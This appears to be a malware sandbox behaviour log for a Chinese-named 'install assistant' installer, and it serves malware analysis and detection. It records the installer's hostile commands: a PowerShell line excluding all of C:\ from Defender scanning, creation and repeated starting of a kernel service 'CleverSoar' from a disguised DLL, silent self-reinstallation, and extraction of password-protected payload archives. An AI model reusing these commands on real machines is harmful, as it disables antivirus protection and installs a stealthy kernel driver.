Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-940M1.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeVirustotal: Detection: 9%
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$6047A,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$6047A,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wldp.dllJump to behavior
